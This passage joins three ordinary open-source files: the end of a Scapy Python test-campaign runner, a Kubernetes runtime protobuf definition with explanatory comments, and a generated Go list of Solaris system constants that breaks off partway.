for vv in range(v1,v2+1):
NUM.append(vv)
elif opt == "-m":
MODULES.append(optarg)
elif opt == "-k":
KW_OK.append(optarg.split(","))
elif opt == "-K":
KW_KO.append(optarg.split(","))
try:
from scapy import all as scapy
except ImportError,e:
raise getopt.GetoptError("cannot import [%s]: %s" % (SCAPY,e))
for m in MODULES:
try:
mod = import_module(m)
__builtin__.__dict__.update(mod.__dict__)
except ImportError,e:
raise getopt.GetoptError("cannot import [%s]: %s" % (m,e))
except getopt.GetoptError,msg:
print >>sys.stderr,"ERROR:",msg
raise SystemExit
autorun_func = {
Format.TEXT: scapy.autorun_get_text_interactive_session,
Format.ANSI: scapy.autorun_get_ansi_interactive_session,
Format.HTML: scapy.autorun_get_html_interactive_session,
Format.LATEX: scapy.autorun_get_latex_interactive_session,
Format.XUNIT: scapy.autorun_get_text_interactive_session,
}
# Parse test file
test_campaign = parse_campaign_file(TESTFILE)
# Report parameters
if PREEXEC:
test_campaign.preexec = PREEXEC
# Compute campaign CRC and SHA
if CRC:
compute_campaign_digests(test_campaign)
# Filter out unwanted tests
filter_tests_on_numbers(test_campaign, NUM)
for k in KW_OK:
filter_tests_keep_on_keywords(test_campaign, k)
for k in KW_KO:
filter_tests_remove_on_keywords(test_campaign, k)
remove_empty_testsets(test_campaign)
# Dump campaign
if DUMP:
dump_campaign(test_campaign)
if DUMP > 1:
sys.exit()
# Run tests
test_campaign.output_file = OUTPUTFILE
run_campaign(test_campaign, autorun_func[FORMAT], verb=VERB)
# Shrink passed
if ONLYFAILED:
for t in test_campaign.all_tests():
if t:
t.expand = 0
else:
t.expand = 2
# Generate report
if FORMAT == Format.TEXT:
output = campaign_to_TEXT(test_campaign)
elif FORMAT == Format.ANSI:
output = campaign_to_ANSI(test_campaign)
elif FORMAT == Format.HTML:
output = campaign_to_HTML(test_campaign, local=LOCAL)
elif FORMAT == Format.LATEX:
output = campaign_to_LATEX(test_campaign)
elif FORMAT == Format.XUNIT:
output = campaign_to_xUNIT(test_campaign)
OUTPUTFILE.write(output)
OUTPUTFILE.close()
if __name__ == "__main__":
main(sys.argv[1:])
| {
"pile_set_name": "Github"
} |
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// This file was autogenerated by go-to-protobuf. Do not edit it manually!
syntax = 'proto2';
package k8s.io.apimachinery.pkg.runtime;
// Package-wide variables from generator "generated".
option go_package = "runtime";
// RawExtension is used to hold extensions in external versions.
//
// To use this, make a field which has RawExtension as its type in your external, versioned
// struct, and Object in your internal struct. You also need to register your
// various plugin types.
//
// // Internal package:
// type MyAPIObject struct {
// runtime.TypeMeta `json:",inline"`
// MyPlugin runtime.Object `json:"myPlugin"`
// }
// type PluginA struct {
// AOption string `json:"aOption"`
// }
//
// // External package:
// type MyAPIObject struct {
// runtime.TypeMeta `json:",inline"`
// MyPlugin runtime.RawExtension `json:"myPlugin"`
// }
// type PluginA struct {
// AOption string `json:"aOption"`
// }
//
// // On the wire, the JSON will look something like this:
// {
// "kind":"MyAPIObject",
// "apiVersion":"v1",
// "myPlugin": {
// "kind":"PluginA",
// "aOption":"foo",
// },
// }
//
// So what happens? Decode first uses json or yaml to unmarshal the serialized data into
// your external MyAPIObject. That causes the raw JSON to be stored, but not unpacked.
// The next step is to copy (using pkg/conversion) into the internal struct. The runtime
// package's DefaultScheme has conversion functions installed which will unpack the
// JSON stored in RawExtension, turning it into the correct object type, and storing it
// in the Object. (TODO: In the case where the object is of an unknown type, a
// runtime.Unknown object will be created and stored.)
//
// +k8s:deepcopy-gen=true
// +protobuf=true
// +k8s:openapi-gen=true
message RawExtension {
// Raw is the underlying serialization of this object.
//
// TODO: Determine how to detect ContentType and ContentEncoding of 'Raw' data.
optional bytes raw = 1;
}
// TypeMeta is shared by all top level objects. The proper way to use it is to inline it in your type,
// like this:
// type MyAwesomeAPIObject struct {
// runtime.TypeMeta `json:",inline"`
// ... // other fields
// }
// func (obj *MyAwesomeAPIObject) SetGroupVersionKind(gvk *metav1.GroupVersionKind) { metav1.UpdateTypeMeta(obj,gvk) }; GroupVersionKind() *GroupVersionKind
//
// TypeMeta is provided here for convenience. You may use it directly from this package or define
// your own with the same fields.
//
// +k8s:deepcopy-gen=false
// +protobuf=true
// +k8s:openapi-gen=true
message TypeMeta {
// +optional
optional string apiVersion = 1;
// +optional
optional string kind = 2;
}
// Unknown allows api objects with unknown types to be passed-through. This can be used
// to deal with the API objects from a plug-in. Unknown objects still have functioning
// TypeMeta features-- kind, version, etc.
// TODO: Make this object have easy access to field based accessors and settors for
// metadata and field mutatation.
//
// +k8s:deepcopy-gen=true
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// +protobuf=true
// +k8s:openapi-gen=true
message Unknown {
optional TypeMeta typeMeta = 1;
// Raw will hold the complete serialized object which couldn't be matched
// with a registered type. Most likely, nothing should be done with this
// except for passing it through the system.
optional bytes raw = 2;
// ContentEncoding is encoding used to encode 'Raw' data.
// Unspecified means no encoding.
optional string contentEncoding = 3;
// ContentType is serialization method used to serialize 'Raw'.
// Unspecified means ContentTypeJSON.
optional string contentType = 4;
}
| {
"pile_set_name": "Github"
} |
// mkerrors.sh -m64
// Code generated by the command above; see README.md. DO NOT EDIT.
// +build amd64,solaris
// Created by cgo -godefs - DO NOT EDIT
// cgo -godefs -- -m64 _const.go
package unix
import "syscall"
const (
AF_802 = 0x12
AF_APPLETALK = 0x10
AF_CCITT = 0xa
AF_CHAOS = 0x5
AF_DATAKIT = 0x9
AF_DECnet = 0xc
AF_DLI = 0xd
AF_ECMA = 0x8
AF_FILE = 0x1
AF_GOSIP = 0x16
AF_HYLINK = 0xf
AF_IMPLINK = 0x3
AF_INET = 0x2
AF_INET6 = 0x1a
AF_INET_OFFLOAD = 0x1e
AF_IPX = 0x17
AF_KEY = 0x1b
AF_LAT = 0xe
AF_LINK = 0x19
AF_LOCAL = 0x1
AF_MAX = 0x20
AF_NBS = 0x7
AF_NCA = 0x1c
AF_NIT = 0x11
AF_NS = 0x6
AF_OSI = 0x13
AF_OSINET = 0x15
AF_PACKET = 0x20
AF_POLICY = 0x1d
AF_PUP = 0x4
AF_ROUTE = 0x18
AF_SNA = 0xb
AF_TRILL = 0x1f
AF_UNIX = 0x1
AF_UNSPEC = 0x0
AF_X25 = 0x14
ARPHRD_ARCNET = 0x7
ARPHRD_ATM = 0x10
ARPHRD_AX25 = 0x3
ARPHRD_CHAOS = 0x5
ARPHRD_EETHER = 0x2
ARPHRD_ETHER = 0x1
ARPHRD_FC = 0x12
ARPHRD_FRAME = 0xf
ARPHRD_HDLC = 0x11
ARPHRD_IB = 0x20
ARPHRD_IEEE802 = 0x6
ARPHRD_IPATM = 0x13
ARPHRD_METRICOM = 0x17
ARPHRD_TUNNEL = 0x1f
B0 = 0x0
B110 = 0x3
B115200 = 0x12
B1200 = 0x9
B134 = 0x4
B150 = 0x5
B153600 = 0x13
B1800 = 0xa
B19200 = 0xe
B200 = 0x6
B230400 = 0x14
B2400 = 0xb
B300 = 0x7
B307200 = 0x15
B38400 = 0xf
B460800 = 0x16
B4800 = 0xc
B50 = 0x1
B57600 = 0x10
B600 = 0x8
B75 = 0x2
B76800 = 0x11
B921600 = 0x17
B9600 = 0xd
BIOCFLUSH = 0x20004268
BIOCGBLEN = 0x40044266
BIOCGDLT = 0x4004426a
BIOCGDLTLIST = -0x3fefbd89
BIOCGDLTLIST32 = -0x3ff7bd89
BIOCGETIF = 0x4020426b
BIOCGETLIF = 0x4078426b
BIOCGHDRCMPLT = 0x40044274
BIOCGRTIMEOUT = 0x4010427b
BIOCGRTIMEOUT32 = 0x4008427b
BIOCGSEESENT = 0x40044278
BIOCGSTATS = 0x4080426f
BIOCGSTATSOLD = 0x4008426f
BIOCIMMEDIATE = -0x7ffbbd90
BIOCPROMISC = 0x20004269
BIOCSBLEN = -0x3ffbbd9a
BIOCSDLT = -0x7ffbbd8a
BIOCSETF = -0x7fefbd99
BIOCSETF32 = -0x7ff7bd99
BIOCSETIF = -0x7fdfbd94
BIOCSETLIF = -0x7f87bd94
BIOCSHDRCMPLT = -0x7ffbbd8b
BIOCSRTIMEOUT = -0x7fefbd86
BIOCSRTIMEOUT32 = -0x7ff7bd86
BIOCSSEESENT = -0x7ffbbd87
BIOCSTCPF = -0x7fefbd8e
BIOCSUDPF = -0x7fefbd8d
BIOCVERSION = 0x40044271
BPF_A = 0x10
BPF_ABS = 0x20
BPF_ADD = 0x0
BPF_ALIGNMENT = 0x4
BPF_ALU = 0x4
BPF_AND = 0x50
BPF_B = 0x10
BPF_DFLTBUFSIZE = 0x100000
BPF_DIV = 0x30
BPF_H = 0x8
BPF_IMM = 0x0
BPF_IND = 0x40
BPF_JA = 0x0
BPF_JEQ = 0x10
BPF_JGE = 0x30
BPF_JGT = 0x20
BPF_JMP = 0x5
BPF_JSET = 0x40
BPF_K = 0x0
BPF_LD = 0x0
BPF_LDX = 0x1
BPF_LEN = 0x80
BPF_LSH = 0x60
BPF_MAJOR_VERSION = 0x1
BPF_MAXBUFSIZE = 0x1000000
BPF_MAXINSNS = 0x200
BPF_MEM = 0x60
BPF_MEMWORDS = 0x10
BPF_MINBUFSIZE = 0x20
BPF_MINOR_VERSION = 0x1
BPF_MISC = 0x7
BPF_MSH = 0xa0
BPF_MUL = 0x20
BPF_NEG = 0x80
BPF_OR = 0x40
BPF_RELEASE = 0x30bb6
BPF_RET = 0x6
BPF_RSH = 0x70
BPF_ST = 0x2
BPF_STX = 0x3
BPF_SUB = 0x10
BPF_TAX = 0x0
BPF_TXA = 0x80
BPF_W = 0x0
BPF_X = 0x8
BRKINT = 0x2
BS0 = 0x0
BS1 = 0x2000
BSDLY = 0x2000
CBAUD = 0xf
CFLUSH = 0xf
CIBAUD = 0xf0000
CLOCAL = 0x800
CLOCK_HIGHRES = 0x4
CLOCK_LEVEL = 0xa
CLOCK_MONOTONIC = 0x4
CLOCK_PROCESS_CPUTIME_ID = 0x5
CLOCK_PROF = 0x2
CLOCK_REALTIME = 0x3
CLOCK_THREAD_CPUTIME_ID = 0x2
CLOCK_VIRTUAL = 0x1
CR0 = 0x0
CR1 = 0x200
CR2 = 0x400
CR3 = 0x600
CRDLY = 0x600
CREAD = 0x80
CRTSCTS = 0x80000000
CS5 = 0x0
CS6 = 0x10
CS7 = 0x20
CS8 = 0x30
CSIZE = 0x30
CSTART = 0x11
CSTATUS = 0x14
CSTOP = 0x13
CSTOPB = 0x40
CSUSP = 0x1a
CSWTCH = 0x1a
DLT_AIRONET_HEADER = 0x78
DLT_APPLE_IP_OVER_IEEE1394 = 0x8a
DLT_ARCNET = 0x7
DLT_ARCNET_LINUX = 0x81
DLT_ATM_CLIP = 0x13
DLT_ATM_RFC1483 = 0xb
DLT_AURORA = 0x7e
DLT_AX25 = 0x3
DLT_BACNET_MS_TP = 0xa5
DLT_CHAOS = 0x5
DLT_CISCO_IOS = 0x76
DLT_C_HDLC = 0x68
DLT_DOCSIS = 0x8f
DLT_ECONET = 0x73
DLT_EN10MB = 0x1
DLT_EN3MB = 0x2
DLT_ENC = 0x6d
DLT_ERF_ETH = 0xaf
DLT_ERF_POS = 0xb0
DLT_FDDI = 0xa
DLT_FRELAY = 0x6b
DLT_GCOM_SERIAL = 0xad
DLT_GCOM_T1E1 = 0xac
DLT_GPF_F = 0xab
DLT_GPF_T = 0xaa
DLT_GPRS_LLC = 0xa9
DLT_HDLC = 0x10
DLT_HHDLC = 0x79
DLT_HIPPI = 0xf
DLT_IBM_SN = 0x92
DLT_IBM_SP = 0x91
DLT_IEEE802 = 0x6
DLT_IEEE802_11 = 0x69
DLT_IEEE802_11_RADIO = 0x7f
DLT_IEEE802_11_RADIO_AVS = 0xa3
DLT_IPNET = 0xe2
DLT_IPOIB = 0xa2
DLT_IP_OVER_FC = 0x7a
DLT_JUNIPER_ATM1 = 0x89
DLT_JUNIPER_ATM2 = 0x87
DLT_JUNIPER_CHDLC = 0xb5
DLT_JUNIPER_ES = 0x84
DLT_JUNIPER_ETHER = 0xb2
DLT_JUNIPER_FRELAY = 0xb4
DLT_JUNIPER_GGSN = 0x85
DLT_JUNIPER_MFR = 0x86
DLT_JUNIPER_MLFR = 0x83
DLT_JUNIPER_MLPPP = 0x82
DLT_JUNIPER_MONITOR = 0xa4
DLT_JUNIPER_PIC_PEER = 0xae
DLT_JUNIPER_PPP = 0xb3
DLT_JUNIPER_PPPOE = 0xa7
DLT_JUNIPER_PPPOE_ATM = 0xa8
DLT_JUNIPER_SERVICES = 0x88
DLT_LINUX_IRDA = 0x90
DLT_LINUX_LAPD = 0xb1
DLT_LINUX_SLL = 0x71
DLT_LOOP = 0x6c
DLT_LTALK = 0x72
DLT_MTP2 = 0x8c
DLT_MTP2_WITH_PHDR = 0x8b
DLT_MTP3 = 0x8d
DLT_NULL = 0x0
DLT_PCI_EXP = 0x7d
DLT_PFLOG = 0x75
DLT_PFSYNC = 0x12
DLT_PPP = 0x9
DLT_PPP_BSDOS = 0xe
DLT_PPP_PPPD = 0xa6
DLT_PRISM_HEADER = 0x77
DLT_PRONET = 0x4
DLT_RAW = 0xc
DLT_RAWAF_MASK = 0x2240000
DLT_RIO = 0x7c
DLT_SCCP = 0x8e
DLT_SLIP = 0x8
DLT_SLIP_BSDOS = 0xd
DLT_SUNATM = 0x7b
DLT_SYMANTEC_FIREWALL = 0x63
DLT_TZSP = 0x80
ECHO = 0x8
ECHOCTL = 0x200
ECHOE = 0x10
ECHOK = 0x20
ECHOKE = 0x800
ECHONL = 0x40
ECHOPRT = 0x400
EMPTY_SET = 0x0
EMT_CPCOVF = 0x1
EQUALITY_CHECK = 0x0
EXTA = 0xe
EXTB = 0xf
FD_CLOEXEC = 0x1
FD_NFDBITS = 0x40
FD_SETSIZE = 0x10000
FF0 = 0x0
FF1 = 0x8000
FFDLY = 0x8000
FLUSHALL = 0x1
FLUSHDATA = 0x0
FLUSHO = 0x2000
F_ALLOCSP = 0xa
F_ALLOCSP64 = 0xa
F_BADFD = 0x2e
F_BLKSIZE = 0x13
F_BLOCKS = 0x12
F_CHKFL = 0x8
F_COMPAT = 0x8
F_DUP2FD = 0x9
F_DUP2FD_CLOEXEC = 0x24
F_DUPFD = 0x0
F_DUPFD_CLOEXEC = 0x25
F_FLOCK = 0x35
F_FLOCK64 = 0x35
F_FLOCKW = 0x36
F_FLOCKW64 = 0x36
F_FREESP = 0xb
F_FREESP64 = 0xb
F_GETFD = 0x1
F_GETFL = 0x3
F_GETLK = 0xe
F_GETLK64 = 0xe
F_GETOWN = 0x17
F_GETXFL = 0x2d
F_HASREMOTELOCKS = 0x1a
F_ISSTREAM = 0xd
F_MANDDNY = 0x10
F_MDACC = 0x20
F_NODNY = 0x0
F_NPRIV = 0x10
F_OFD_GETLK = 0x2f
F_OFD_GETLK64 = 0x2f
F_OFD_SETLK = 0x30
F_OFD_SETLK64 = 0x30
F_OFD_SETLKW = 0x31
F_OFD_SETLKW64 = 0x31
F_PRIV = 0xf
F_QUOTACTL = 0x11
F_RDACC = 0x1
F_RDDNY = 0x1
F_RDLCK = 0x1
F_REVOKE = 0x19
F_RMACC = 0x4
F_RMDNY = 0x4
F_RWACC = 0x3
F_RWDNY = 0x3
F_SETFD = 0x2
F_SETFL = 0x4
F_SETLK = 0x6
F_SETLK64 = 0x6
F_SETLK64_NBMAND = 0x2a
F_SETLKW = 0x7
F_SETLKW64 = 0x7
F_SETLK_NBMAND = 0x2a
F_SETOWN = 0x18
F_SHARE = 0x28
F_SHARE_NBMAND = 0x2b
F_UNLCK = 0x3
F_UNLKSYS = 0x4
F_UNSHARE = 0x29
F_WRACC = 0x2
F_WRDNY = 0x2
F_WRLCK = 0x2
HUPCL = 0x400
IBSHIFT = 0x10
ICANON = 0x2
ICRNL = 0x100
IEXTEN = 0x8000
IFF_ADDRCONF = 0x80000
IFF_ALLMULTI = 0x200
IFF_ANYCAST = 0x400000
IFF_BROADCAST = 0x2
IFF_CANTCHANGE = 0x7f203003b5a
IFF_COS_ENABLED = 0x200000000
IFF_DEBUG = 0x4
IFF_DEPRECATED = 0x40000
IFF_DHCPRUNNING = 0x4000
IFF_DUPLICATE = 0x4000000000
IFF_FAILED = 0x10000000
IFF_FIXEDMTU = 0x1000000000
IFF_INACTIVE = 0x40000000
IFF_INTELLIGENT = 0x400
IFF_IPMP = 0x8000000000
IFF_IPMP_CANTCHANGE = 0x10000000
IFF_IPMP_INVALID = 0x1ec200080
IFF_IPV4 = 0x1000000
IFF_IPV6 = 0x2000000
IFF_L3PROTECT = 0x40000000000
IFF_LOOPBACK = 0x8
IFF_MULTICAST = 0x800
IFF_MULTI_BCAST = 0x1000
IFF_NOACCEPT = 0x4000000
IFF_NOARP = 0x80
IFF_NOFAILOVER = 0x8000000
IFF_NOLINKLOCAL = 0x20000000000
IFF_NOLOCAL = 0x20000
IFF_NONUD = 0x200000
IFF_NORTEXCH = 0x800000
IFF_NOTRAILERS = 0x20
IFF_NOXMIT = 0x10000
IFF_OFFLINE = 0x80000000
IFF_POINTOPOINT = 0x10
IFF_PREFERRED = 0x400000000
IFF_PRIVATE = 0x8000
IFF_PROMISC = 0x100
IFF_ROUTER = 0x100000
IFF_RUNNING = 0x40
IFF_STANDBY = 0x20000000
IFF_TEMPORARY = 0x800000000
IFF_UNNUMBERED = 0x2000
IFF_UP = 0x1
IFF_VIRTUAL = 0x2000000000
IFF_VRRP = 0x10000000000
IFF_XRESOLV = 0x100000000
IFNAMSIZ = 0x10
IFT_1822 = 0x2
IFT_6TO4 = 0xca
IFT_AAL5 = 0x31
IFT_ARCNET = 0x23
IFT_ARCNETPLUS = 0x24
IFT_ATM = 0x25
IFT_CEPT = 0x13
IFT_DS3 = 0x1e
IFT_EON = 0x19
IFT_ETHER = 0x6
IFT_FDDI = 0xf
IFT_FRELAY = 0x20
IFT_FRELAYDCE = 0x2c
IFT_HDH1822 = 0x3
IFT_HIPPI = 0x2f
IFT_HSSI = 0x2e
IFT_HY = 0xe
IFT_IB = 0xc7
IFT_IPV4 = 0xc8
IFT_IPV6 = 0xc9
IFT_ISDNBASIC = 0x14
IFT_ISDNPRIMARY = 0x15
IFT_ISO88022LLC = 0x29
IFT_ISO88023 = 0x7
IFT_ISO88024 = 0x8
IFT_ISO88025 = 0x9
IFT_ISO88026 = 0xa
IFT_LAPB = 0x10
IFT_LOCALTALK = 0x2a
IFT_LOOP = 0x18
IFT_MIOX25 = 0x26
IFT_MODEM = 0x30
IFT_NSIP = 0x1b
IFT_OTHER = 0x1
IFT_P10 = 0xc
IFT_P80 = 0xd
IFT_PARA = 0x22
IFT_PPP = 0x17
IFT_PROPMUX = 0x36
IFT_PROPVIRTUAL = 0x35
IFT_PTPSERIAL = 0x16
IFT_RS232 = 0x21
IFT_SDLC = 0x11
IFT_SIP = 0x1f
IFT_SLIP = 0x1c
IFT_SMDSDXI = 0x2b
IFT_SMDSICIP = 0x34
IFT_SONET = 0x27
IFT_SONETPATH = 0x32
IFT_SONETVT = 0x33
IFT_STARLAN = 0xb
IFT_T1 = 0x12
IFT_ULTRA = 0x1d
IFT_V35 = 0x2d
IFT_X25 = 0x5
IFT_X25DDN = 0x4
IFT_X25PLE = 0x28
IFT_XETHER = 0x1a
IGNBRK = 0x1
IGNCR = 0x80
IGNPAR = 0x4
IMAXBEL = 0x2000
INLCR = 0x40
INPCK = 0x10
IN_AUTOCONF_MASK = 0xffff0000
IN_AUTOCONF_NET = 0xa9fe0000
IN_CLASSA_HOST = 0xffffff
IN_CLASSA_MAX = 0x80
IN_CLASSA_NET = 0xff000000
IN_CLASSA_NSHIFT = 0x18
IN_CLASSB_HOST = 0xffff
IN_CLASSB_MAX = 0x10000
IN_CLASSB_NET = 0xffff0000
IN_CLASSB_NSHIFT = 0x10
IN_CLASSC_HOST = 0xff
IN_CLASSC_NET = 0xffffff00
IN_CLASSC_NSHIFT = 0x8
IN_CLASSD_HOST = 0xfffffff
IN_CLASSD_NET = 0xf0000000
IN_CLASSD_NSHIFT = 0x1c
IN_CLASSE_NET = 0xffffffff
IN_LOOPBACKNET = 0x7f
IN_PRIVATE12_MASK = 0xfff00000
IN_PRIVATE12_NET = 0xac100000
IN_PRIVATE16_MASK = 0xffff0000
IN_PRIVATE16_NET = 0xc0a80000
IN_PRIVATE8_MASK = 0xff000000
IN_PRIVATE8_NET = 0xa000000
IPPROTO_AH = 0x33
IPPROTO_DSTOPTS = 0x3c
IPPROTO_EGP = 0x8
IPPROTO_ENCAP = 0x4
IPPROTO_EON = 0x50
IPPROTO_ESP = 0x32
IPPROTO_FRAGMENT = 0x2c
IPPROTO_GGP = 0x3
IPPROTO_HELLO = 0x3f
IPPROTO_HOPOPTS = 0x0
IPPROTO_ICMP = 0x1
IPPROTO_ICMPV6 = 0x3a
IPPROTO_IDP = 0x16
IPPROTO_IGMP = 0x2
IPPROTO_IP = 0x0
IPPROTO_IPV6 = 0x29
IPPROTO_MAX = 0x100
IPPROTO_ND = 0x4d
IPPROTO_NONE = 0x3b
IPPROTO_OSPF = 0x59
IPPROTO_PIM = 0x67
IPPROTO_PUP = 0xc
IPPROTO_RAW = 0xff
IPPROTO_ROUTING = 0x2b
IPPROTO_RSVP = 0x2e
IPPROTO_SCTP = 0x84
IPPROTO_TCP = 0x6
IPPROTO_UDP = 0x11
IPV6_ADD_MEMBERSHIP = 0x9
IPV6_BOUND_IF = 0x41
IPV6_CHECKSUM = 0x18
IPV6_DONTFRAG = 0x21
IPV6_DROP_MEMBERSHIP = 0xa
IPV6_DSTOPTS = 0xf
IPV6_FLOWINFO_FLOWLABEL = 0xffff0f00
IPV6_FLOWINFO_TCLASS = 0xf00f
IPV6_HOPLIMIT = 0xc
IPV6_HOPOPTS = 0xe
IPV6_JOIN_GROUP = 0x9
IPV6_LEAVE_GROUP = 0xa
IPV6_MULTICAST_HOPS = 0x7
IPV6_MULTICAST_IF = 0x6
IPV6_MULTICAST_LOOP = 0x8
IPV6_NEXTHOP = 0xd
IPV6_PAD1_OPT = 0x0
IPV6_PATHMTU = 0x25
IPV6_PKTINFO = 0xb
IPV6_PREFER_SRC_CGA = 0x20
IPV6_PREFER_SRC_CGADEFAULT = 0x10
IPV6_PREFER_SRC_CGAMASK = 0x30
IPV6_PREFER_SRC_COA = 0x2
IPV6_PREFER_SRC_DEFAULT = 0x15
IPV6_PREFER_SRC_HOME = 0x1
IPV6_PREFER_SRC_MASK = 0x3f
IPV6_PREFER_SRC_MIPDEFAULT = 0x1
IPV6_PREFER_SRC_MIPMASK = 0x3
IPV6_PREFER_SRC_NONCGA = 0x10
IPV6_PREFER_SRC_PUBLIC = 0x4
IPV6_PREFER_SRC_TMP = 0x8
IPV6_PREFER_SRC_TMPDEFAULT = 0x4
IPV6_PREFER_SRC_TMPMASK = 0xc
IPV6_RECVDSTOPTS = 0x28
IPV6_RECVHOPLIMIT = 0x13
IPV6_RECVHOPOPTS = 0x14
IPV6_RECVPATHMTU = 0x24
IPV6_RECVPKTINFO = 0x12
IPV6_RECVRTHDR = 0x16
IPV6_RECVRTHDRDSTOPTS = 0x17
IPV6_RECVTCLASS = 0x19
IPV6_RTHDR = 0x10
IPV6_RTHDRDSTOPTS = 0x11
IPV6_RTHDR_TYPE_0 = 0x0
IPV6_SEC_OPT = 0x22
IPV6_SRC_PREFERENCES = 0x23
IPV6_TCLASS = 0x26
IPV6_UNICAST_HOPS = 0x5
IPV6_UNSPEC_SRC = 0x42
IPV6_USE_MIN_MTU = 0x20
IPV6_V6ONLY = 0x27
IP_ADD_MEMBERSHIP = 0x13
IP_ADD_SOURCE_MEMBERSHIP = 0x17
IP_BLOCK_SOURCE = 0x15
IP_BOUND_IF = 0x41
IP_BROADCAST = 0x106
IP_BROADCAST_TTL = 0x43
IP_DEFAULT_MULTICAST_LOOP = 0x1
IP_DEFAULT_MULTICAST_TTL = 0x1
IP_DF = 0x4000
IP_DHCPINIT_IF = 0x45
IP_DONTFRAG = 0x1b
IP_DONTROUTE = 0x105
IP_DROP_MEMBERSHIP = 0x14
IP_DROP_SOURCE_MEMBERSHIP = 0x18
IP_HDRINCL = 0x2
IP_MAXPACKET = 0xffff
IP_MF = 0x2000
IP_MSS = 0x240
IP_MULTICAST_IF = 0x10
IP_MULTICAST_LOOP = 0x12
IP_MULTICAST_TTL = 0x11
IP_NEXTHOP = 0x19
IP_OPTIONS = 0x1
IP_PKTINFO = 0x1a
IP_RECVDSTADDR = 0x7
IP_RECVIF = 0x9
IP_RECVOPTS = 0x5
IP_RECVPKTINFO = 0x1a
IP_RECVRETOPTS = 0x6
IP_RECVSLLA = 0xa
IP_RECVTTL = 0xb
IP_RETOPTS = 0x8
IP_REUSEADDR = 0x104
IP_SEC_OPT = 0x22
IP_TOS = 0x3
IP_TTL = 0x4
IP_UNBLOCK_SOURCE = 0x16
IP_UNSPEC_SRC = 0x42
ISIG = 0x1
ISTRIP = 0x20
IUCLC = 0x200
IXANY = 0x800
IXOFF = 0x1000
IXON = 0x400
LOCK_EX = 0x2
LOCK_NB = 0x4
LOCK_SH = 0x1
LOCK_UN = 0x8
MADV_ACCESS_DEFAULT = 0x6
MADV_ACCESS_LWP = 0x7
MADV_ACCESS_MANY = 0x8
MADV_DONTNEED = 0x4
MADV_FREE = 0x5
MADV_NORMAL = 0x0
MADV_PURGE = 0x9
MADV_RANDOM = 0x1
MADV_SEQUENTIAL = 0x2
MADV_WILLNEED = 0x3
MAP_32BIT = 0x80
MAP_ALIGN = 0x200
MAP_ANON = 0x100
MAP_ANONYMOUS = 0x100
MAP_FILE = 0x0
MAP_FIXED = 0x10
MAP_INITDATA = 0x800
MAP_NORESERVE = 0x40
MAP_PRIVATE = 0x2
MAP_RENAME = 0x20
MAP_SHARED = 0x1
MAP_TEXT = 0x400
MAP_TYPE = 0xf
MCL_CURRENT = 0x1
MCL_FUTURE = 0x2
MSG_CTRUNC = 0x10
MSG_DONTROUTE = 0x4
MSG_DONTWAIT = 0x80
MSG_DUPCTRL = 0x800
MSG_EOR = 0x8
MSG_MAXIOVLEN = 0x10
MSG_NOTIFICATION = 0x100
MSG_OOB = 0x1
MSG_PEEK = 0x2
MSG_TRUNC = 0x20
MSG_WAITALL = 0x40
MSG_XPG4_2 = 0x8000
MS_ASYNC = 0x1
MS_INVALIDATE = 0x2
MS_OLDSYNC = 0x0
MS_SYNC = 0x4
M_FLUSH = 0x86
NAME_MAX = 0xff
NEWDEV = 0x1
NL0 = 0x0
NL1 = 0x100
NLDLY = 0x100
NOFLSH = 0x80
OCRNL = 0x8
OFDEL = 0x80
OFILL = 0x40
OLCUC = 0x2
OLDDEV = 0x0
ONBITSMAJOR = 0x7
ONBITSMINOR = 0x8
ONLCR = 0x4
ONLRET = 0x20
ONOCR = 0x10
OPENFAIL = -0x1
OPOST = 0x1
O_ACCMODE = 0x600003
O_APPEND = 0x8
O_CLOEXEC = 0x800000
O_CREAT = 0x100
O_DSYNC = 0x40
O_EXCL = 0x400
O_EXEC = 0x400000
O_LARGEFILE = 0x2000
O_NDELAY = 0x4
O_NOCTTY = 0x800
O_NOFOLLOW = 0x20000
O_NOLINKS = 0x40000
O_NONBLOCK = 0x80
O_RDONLY = 0x0
O_RDWR = 0x2
O_RSYNC = 0x8000
O_SEARCH = 0x200000
O_SIOCGIFCONF = -0x3ff796ec
O_SIOCGLIFCONF = -0x3fef9688
O_SYNC = 0x10
O_TRUNC = 0x200
O_WRONLY = 0x1
O_XATTR = 0x4000
PARENB = 0x100
PAREXT = 0x100000
PARMRK = 0x8
PARODD = 0x200
PENDIN = 0x4000
PRIO_PGRP = 0x1
PRIO_PROCESS = 0x0
PRIO_USER = 0x2
PROT_EXEC = 0x4
PROT_NONE = 0x0
PROT_READ = 0x1
PROT_WRITE = 0x2
RLIMIT_AS = 0x6
RLIMIT_CORE = 0x4
RLIMIT_CPU = 0x0
RLIMIT_DATA = 0x2
RLIMIT_FSIZE = 0x1
RLIMIT_NOFILE = 0x5
RLIMIT_STACK = 0x3
RLIM_INFINITY = -0x3
RTAX_AUTHOR = 0x6
RTAX_BRD = 0x7
RTAX_DST = 0x0
RTAX_GATEWAY = 0x1
RTAX_GENMASK = 0x3
RTAX_IFA = 0x5
RTAX_IFP = 0x4
RTAX_MAX = 0x9
RTAX_NETMASK = 0x2
RTAX_SRC = 0x8
RTA_AUTHOR = 0x40
RTA_BRD = 0x80
RTA_DST = 0x1
RTA_GATEWAY = 0x2
RTA_GENMASK = 0x8
RTA_IFA = 0x20
RTA_IFP = 0x10
RTA_NETMASK = 0x4
RTA_NUMBITS = 0x9
RTA_SRC = 0x100
RTF_BLACKHOLE = 0x1000
RTF_CLONING = 0x100
RTF_DONE = 0x40
RTF_DYNAMIC = 0x10
RTF_GATEWAY = 0x2
RTF_HOST = 0x4
RTF_INDIRECT = 0x40000
RTF_KERNEL = 0x80000
RTF_LLINFO = 0x400
RTF_MASK = 0x80
RTF_MODIFIED = 0x20
RTF_MULTIRT = 0x10000
RTF_PRIVATE = 0x2000
RTF_PROTO1 = 0x8000
RTF_PROTO2 = 0x4000
RTF_REJECT = 0x8
RTF_SETSRC = 0x20000
RTF_STATIC = 0x800
RTF_UP = 0x1
RTF_XRESOLVE = 0x200
RTF_ZONE = 0x100000
RTM_ADD = 0x1
RTM_CHANGE = 0x3
RTM_CHGADDR = 0xf
RTM_DELADDR = 0xd
RTM_DELETE = 0x2
